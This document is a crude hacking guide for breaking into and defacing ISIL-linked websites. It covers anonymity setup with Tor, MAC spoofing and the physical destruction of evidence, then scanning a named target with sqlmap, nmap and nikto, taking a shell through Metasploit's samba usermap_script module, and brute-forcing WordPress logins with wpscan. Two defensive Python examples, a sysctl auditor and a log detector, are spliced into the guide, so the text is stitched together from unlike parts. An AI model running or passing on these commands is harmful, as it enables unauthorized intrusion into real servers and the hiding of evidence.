B1tsh1fter's Legionary Noob guide to Fucking ISIL online.
https://www.youtube.com/watch?v=V1fMvLbE85E
Vol 1 Website Defacement (Just in time for fuck ISIL friday.)
####################################################################################
The term "website defacement" refers to any unauthorized changes made to the appearance of either a single webpage, or an entire site.
Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work
of system crackers, who break into a web server and replace the hosted website with one of their own.
1337 SETUP not for noobs
####################################################################################
Mifi access point.
https://www.verizonwireless.com/internet-devices/jetpack-mifi-6620l/ $49.99
Prepaid sim cards
http://www.ebay.com/sch/Verizon-SIM-Cards/29778/bn_591704/i.html
https://www.youtube.com/watch?v=RyzKNMQB3OQ
Fake Name generator
https://fakena.me/fake-name/
DAVIS STANDARD WIRELESS REPEATER SOLAR POWERED $200.00
https://jet.com/product/detail/ca20e31f9fb34add9071c2b1d21c7575
Turn off SSID broadcast; just type the SSID in at the client.
SETUP
####################################################################################
Set random mac address first, before connecting to wifi.
MAC Address Changer for windoze
https://technitium.com/tmac/
Download the latest version of the Kali Linux .iso from a free wifi access point & burn it on a laptop/computer.
https://www.kali.org/downloads/
Boot from dvd drive;
Install onto 16GB usb drive
(Warning: do not use "USB persistence"; this is different. Just install onto the USB drive using the Kali graphical install.)
On This drive;
CORSAIR Padlock 2 16GB USB 2.0 Flash Drive AES Hardware-based encryption $29.99
http://www.newegg.com/Product/Product.aspx?Item=N82E16820233128
Also use LVM encryption in the Kali graphic install options.
The OS is now dual, numberpad AES hardware encrypted & password AES LVM encrypted.
When the drive is removed it leaves no trace on the computer.
Destroy original Kali install disk with by cooking microwave for 3 min,
shatter into pieces and dump in unmarked dumpster at least 5 blocks from residence (wear thick rubber gloves).
Set the BIOS to boot from the USB drive and away we go.
IN CASE OF EMERGENCY!!
Microwave USB drive for 5 min!! This will destroy the internal NAND chip and all data with it.
Kali boots with the "root" user enabled by default; this is insecure, so we must change it.
Enter the following into the terminal;
sudo adduser an0n
Then enter a password and leave the info fields blank.
Add the user to the sudoers list;
Enter the following into the terminal;
sudo usermod -a -G sudo an0n
Disable the root account;
Enter the following into the terminal;
sudo passwd -l root
# Ignore ICMP broadcast requests
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Disable source packet routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv6.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv6.conf.default.accept_source_route = 0
# Ignore send redirects
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# Block SYN attacks
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 2
net.ipv4.tcp_syn_retries = 5
# Log Martians
net.ipv4.conf.all.log_martians = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Ignore ICMP redirects
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv6.conf.default.accept_redirects = 0
# Ignore Directed pings
net.ipv4.icmp_echo_ignore_all = 1
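The settings above are in sysctl.conf syntax (/etc/sysctl.conf or a file under /etc/sysctl.d/), and they only protect a host while the running kernel actually holds those values. The following is an added example, not part of the original guide, that audits live values against such a baseline; the function names and the shortened baseline text are assumptions made for the example.

```python
# Added example: compare running kernel network settings with a sysctl baseline.
# parse_baseline, read_proc and audit are names chosen for this example.
from pathlib import Path

# Constructed excerpt of the baseline listed above, in sysctl.conf syntax.
BASELINE = """
# Ignore ICMP broadcast requests
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.all.accept_redirects = 0
"""

def parse_baseline(text):
    """Parse 'key = value' lines; skip blank lines and '#' or ';' comments."""
    wanted = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"not a key = value line: {raw!r}")
        wanted[key.strip()] = value.strip()
    return wanted

def read_proc(key, root="/proc/sys"):
    """Return the live value of a sysctl key, or None if it cannot be read.

    Dots map to path separators, which is correct for the 'all' and 'default'
    keys used here but not for interface names that themselves contain dots.
    """
    try:
        return " ".join(Path(root, *key.split(".")).read_text().split())
    except OSError:
        return None

def audit(wanted, reader=read_proc):
    """Return {key: (expected, actual)} for every setting that has drifted."""
    drift = {}
    for key, expected in wanted.items():
        actual = reader(key)
        if actual != expected:
            drift[key] = (expected, actual)
    return drift

if __name__ == "__main__":
    for key, (exp, act) in sorted(audit(parse_baseline(BASELINE)).items()):
        print(f"DRIFT {key}: expected {exp}, running {act}")
```

A key reported with a running value of None is one the kernel does not expose, for example IPv6 keys on a host with IPv6 disabled.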
Chapter 1 Anonymity or "No shit sherlock":
####################################################################################
For this chapter, log in to a free wifi access point if possible.
Install macchanger;
Enter the following into the terminal;
sudo apt-get update && sudo apt-get install macchanger
sudo apt-get install net-tools
ifconfig
sudo touch Desktop/MAC.sh && sudo chmod 755 Desktop/MAC.sh
sudo nano Desktop/MAC.sh
#!/bin/bash
# enp2s0 is the interface name shown by ifconfig; take it down, randomize the MAC, bring it back up
sudo ifconfig enp2s0 down && sudo macchanger -r enp2s0 && sudo ifconfig enp2s0 up
Very Important!!: Must run the following command on each boot without fail;
sudo ifconfig eth0 down && sudo macchanger -r eth0 && sudo ifconfig eth0 up
Fuck VPN's they lie, can get compromised and/or subpoenaed;
tunnel ALL through tor with the following config:
Enter the following into the terminal;
sudo apt-get install tor && sudo apt-get install firehol &&
sudo nano /etc/default/firehol
Modify the following in the file to START_FIREHOL=YES
TOR config
Edit the following file;
sudo nano /etc/tor/torrc
to this:
####start below here####
VirtualAddrNetworkIPv4 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 53
FascistFirewall 1
FirewallPorts 443
DataDirectory /var/lib/tor
PidFile /var/run/tor/tor.pid
User debian-tor
ClientOnly
ExitNodes {us}
####end above here#####
Firehol config
sudo nano /etc/firehol/firehol.conf
to this:
####start below here####
version 5
server_tor_ports="tcp/9050 tcp/9051"
client_tor_ports="default"
server_proxy_ports="tcp/9040"
client_proxy_ports="default"
server_polipo_ports="tcp/8118"
client_polipo_ports="default"
server_dns_ports="udp/53"
client_dns_ports="default"
#all incoming DNS goes to port 53 or whatever your torrc's DNSPort is
#for local redirection make sure your /etc/resolv.conf reads 'nameserver 127.0.0.1'
redirect to 53 inface eth+ proto udp src 192.168.0.0/16 dst not 127.0.0.1 dport 53
#add to force all incoming tcp traffic to 9040
#for some reason this will redirect locally generated tcp traffic too
transparent_proxy "1:65535" 9040 debian-tor inface eth+ user not debian-tor dst not "$UNROUTABLE_IPS"
interface eth0 dhcp
policy return
client dhcp accept
client all accept
#allow only outgoing TOR traffic
interface eth0 internet src not "$UNROUTABLE_IPS"
client all accept user debian-tor
#add for local DNS and proxy access
interface "eth0 lo" local src "192.168.1.2 127.0.0.1" dst "192.168.1.2 127.0.0.1"
server dns accept
server privoxy accept
server tor accept
server proxy accept
#add for local TOR socks and control port access
interface lo internal src 127.0.0.1 dst 127.0.0.1
server tor accept
server proxy accept
####end above here#####
Remove iceweasel and install firefox
Enter the following into the terminal;
apt-get remove iceweasel &&
echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list > /dev/null &&
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 &&
apt-get update &&
apt-get install firefox-mozilla-build
Firefox plugins to install;
https://addons.mozilla.org/en-US/firefox/addon/cookie-whitelist-with-buttons/
https://addons.mozilla.org/en-US/firefox/addon/sslpersonas/
https://addons.mozilla.org/en-US/firefox/addon/ghostery/
https://addons.mozilla.org/en-US/firefox/addon/smart-https/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/
https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/
https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
configure foxyproxy to use tor at 127.0.0.1 9050 socks 4a
Install proxychains to stay stealth
Enter the following into the terminal;
sudo apt-get install proxychains
Chapter 2 Target Acquired or "How 1337 am I?"
####################################################################################
Enter the following into the terminal;
sudo proxychains nslookup www.Jihadist.ps
####output start####
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
www.Jihadist.ps canonical name = Jihadist.ps.
Name: Jihadist.ps
Address: 104.28.##.105
Name: Jihadist.ps
Address: 104.28.##.105
####output end####
run sqlmap over tor with random user agent at target page for usernames and passwords;
Enter the following into the terminal;
sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
run nmap in a separate terminal while we wait for the results
Scan the ip with nmap + proxychains to route it over tor
set to zero ping "-Pn" to avoid detection The
-Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS;
Enter the following into the terminal;
sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
Scan the site with nikto + proxychains to route it over tor;
Enter the following into the terminal;
sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
Scan the site with uniscan + proxychains to route it over tor;
Enter the following into the terminal;
sudo proxychains ./uniscan -u https://www.Jihadist.ps/
The following info should have been obtained with the help of the tor cloaked scanning
Target ip (from nslookup) 104.28.##.105
Target OS and Version from nmap.
kick it oldschool by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
We need to find out the OS and ports and services running on the target system.
EXAMPLE;
Once you find the open ports and service like a samba port its party time.
Fire up Metasploit!
Enter the following into the terminal;
msfconsole
Enter the follow into the Metasploit framework console;
msf >set Proxies socks5:127.0.0.1:9050
We need to find the version of samba..
Enter each into the follow into the Metasploit framework console;
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit
With version in hand, restart msfconsole now we use the appropriate module...
msfconsole
msf >set Proxies socks5:127.0.0.1:9050
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit
We now have a command shell on the target box!
Chapter 3 Other methods of infiltration or "Boba fett is dead!"
####################################################################################
If using Wordpress; (Credit to Dr Chaos);
wpscan –-url wordpress_url
You should be able to quickly determine the WordPress version, which plugins are installed, and what theme is active when you open the scanner.
The first thing we will do is look for lines beginning with a red plus (+). These are the known WordPress vulnerabilities.
If the correct vulnerability exists, you can enumerate a user list from WordPress with the following command:
wpscan –-url wordpress_url –-enumerate u
Once user names have been collected, you then can attempt to brute force crack the associated passwords.
You can also download our custom word list from here: /usr/share/wordlists
WARNING: DO A SAVE AS OR YOUR BROWSER MAY CRASH
wget http://www.drchaos.com/public_files/chaos-dictionary.lst.txt
Brute force the following command:
wpscan –-url [wordpress_url] –-word list [path_to_world list] –-username [username to bruteforce] –threads [number of threads]
The result? If you are lucky, you can see WPScan was able to crack the password.
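From the site owner's side, the enumeration and password guessing described above leave a recognisable pattern in the web access log: sequential ?author=N requests or reads of the REST users endpoint, followed by POSTs to wp-login.php or xmlrpc.php. The following is an added example, not part of the original guide, that flags both; the log lines are constructed and the burst threshold is an assumption. Because traffic sent through Tor can arrive from many addresses, it counts login POSTs per minute across all sources instead of per IP.

```python
# Added example: flag WordPress user enumeration and password guessing in a web
# access log. Log lines are constructed; the threshold is an assumption.
import re
from collections import Counter, defaultdict

# Combined Log Format: ip - - [time] "METHOD path PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
AUTHOR_ENUM = re.compile(r"[?&]author=(\d+)")   # author-ID probing
USERS_API = "/wp-json/wp/v2/users"               # REST user listing
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def _line(ip, sec, method, path, status):
    return (f'{ip} - - [12/Feb/2016:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 0 "-" "-"')

# Constructed sample: one enumerator, then guesses spread over six addresses.
SAMPLE_LOG = "\n".join(
    [_line("198.51.100.7", i, "GET", f"/?author={i}", 301) for i in (1, 2, 3)]
    + [_line(f"203.0.113.{i}", 10 + i, "POST", "/wp-login.php", 200)
       for i in range(1, 7)]
    + [_line("192.0.2.10", 50, "GET", "/index.php", 200),
       _line("192.0.2.10", 55, "POST", "/wp-login.php", 302)])

def parse(log_text):
    """Yield (ip, minute, method, path) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ip, ts, method, path, _status = m.groups()
            yield ip, ts[:17], method, path     # ts[:17] is the minute bucket

def detect(log_text, burst_threshold=5):
    """Summarise enumeration probes and per-minute login POST bursts."""
    enum_ids, enum_ips = set(), set()
    per_minute, per_ip = Counter(), Counter()
    sources = defaultdict(set)
    for ip, minute, method, path in parse(log_text):
        hit = AUTHOR_ENUM.search(path)
        if hit or path.startswith(USERS_API):
            enum_ips.add(ip)
            if hit:
                enum_ids.add(int(hit.group(1)))
        elif method == "POST" and path.split("?")[0] in LOGIN_PATHS:
            per_minute[minute] += 1             # all sources combined
            per_ip[ip] += 1
            sources[minute].add(ip)
    bursts = {m: (n, len(sources[m]))
              for m, n in per_minute.items() if n >= burst_threshold}
    return {"enum_ids": sorted(enum_ids), "enum_sources": sorted(enum_ips),
            "login_bursts": bursts,
            "max_posts_per_ip": max(per_ip.values(), default=0)}
```

On the sample, the busiest single address sends one login POST, so a per-IP threshold stays silent while the per-minute count reports seven POSTs from seven sources.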
To be continued...
What does the Fawkes say?